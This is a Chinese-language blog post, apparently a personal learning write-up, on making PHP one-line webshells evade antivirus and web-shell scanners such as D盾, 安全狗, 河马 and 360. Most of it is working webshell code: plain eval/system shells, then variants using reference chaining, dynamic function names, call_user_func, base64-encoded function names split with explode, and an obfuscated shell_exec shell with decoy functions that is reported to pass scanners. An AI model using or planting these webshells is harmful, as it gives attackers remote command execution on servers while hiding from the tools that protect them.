开封建设网站网站运营专员做六休一

终于也是来到了激动人心的时刻——免杀，这集先是简单的一句话木马的免杀

首先是经典的一句话木马：

<?php system($_POST['xxx']); ?>
<?php eval($_POST['xxx']); ?>
<?php echo shell_exec($_POST['xxx']); ?>
<?php assert($_POST['xxx']); ?>

然而这样朴实无华的直接上传肯定是会被杀软拦截，所以就用到了免杀的技巧

本次用来测试的环境有D盾，安全狗，河马webshell在线查杀（SHELLPUB.COM在线查杀）

首先用我自己的几个普通的一句话木马进行环境测试

发现直接就能测出来，那么接下来就是免杀的测试

传参

首先简单尝试一下多传几次参

<?php
$a=$_POST['xxx'];
$b=&$a;
$c=&$b:
eval($c);
?>

没想到这么简单就绕过了安全狗

可惜没绕过D盾

这个也是轻松查了出来，看来这样的方法注定不可能长久

当然了我们还有其他小骚招

传参绕过

可以把传入的函数名写在请求中获取，通过将函数名动态地从外部传递。

<?php$v=$_GET['func'];$v($_GET['xxx']);?>

此时可以把func传参为system，把xxx作为命令。

然后把这个方法和回调函数结合

<?php
$f=$_GET['func'];
$v=$_GET['xxx'];
call_user_func($f,$v);
?>

还可以给回调函数上一个base64加密

可惜过了D盾过不了河马

但是大佬的文章中有破局之法，那就是php中的分隔函数explode() 函数

<?php
function DD($Data) {return base64_decode($Data);
}
$a = explode("!",$_GET['s']);
DD("Y2FsbF91c2VyX2Z1bmM=")($a[0],$a[1]);
?>

这里只要传参传system!echo hack就能成功RCE

检测结果也是不必说，轻松绕过

二维数组

在免杀时我们可以考虑见要执行的一句话木马程序放到数组中执行达到绕过的目的

<?php
$a=substr_replace("assexx","rt",4);
$b=array($array=array(''=>$a($_POST['p'])));
var_dump($b);
?>

可惜的是并不行，应该是我看的文章时间有点久了，红温了喵

加密

简单的base64加密我就不尝试了，肯定过不了杀软，让我们直接来点够劲的

。。。md测试中传来噩耗，本来搞了个这个

<?phpeval($_POST["\x78\x78\170"]);

我一看这也测不到，以为成功了，结果是我的windows把我的php文件删了，牛魔的不搞这些有的没的了，直接上混淆

<?php 
function safe_waf(){$data1 = "1qazxsw23edcvfr45tgb";$data2 = "1qazXSW@3edcVFR$6yhn";$data3 = "!QAZxsw2#EDCvfr4%TGB";for ($i = 0; $i < 10; $i++) {$data1[$i % strlen($data1)];}$a = 5;$b = 10;$c = $a + $b;$a_safe = array();for ($j = 0; $j < 10; $j++) {$a_safe[] = md5($j.$data2);}return $c;
}function Safe(){$t = "1qazxsw23edcvfr45tgb";$result = strrev($t);return $result;
}function DD($Data) {return base64_decode($Data);
}
safe_waf();
echo DD("c2hlbGxfZXhlYw==")($_GET['xxx']);
Safe();
?>

PHP webshell 免杀方法_php免杀马-CSDN博客

这是粘贴这个大佬的

这里面加入了Safe和Save_waf两个无用的函数，演的更像一点

可用性就不测了，复制粘贴的包是可用的

这个马本来大佬说是绕不过安恒云沙箱的，但是我拿微步测了一下居然成功绕过了，也是很有生活了

大佬那个文章里还有用AES加密进行绕过的方法，可惜我没怎么学密码，所以就不复现了喵

那么最后来点我感兴趣的，我们的360大人能否查杀到这几个免杀马呢

360大人终究也是陨落了吗（doge）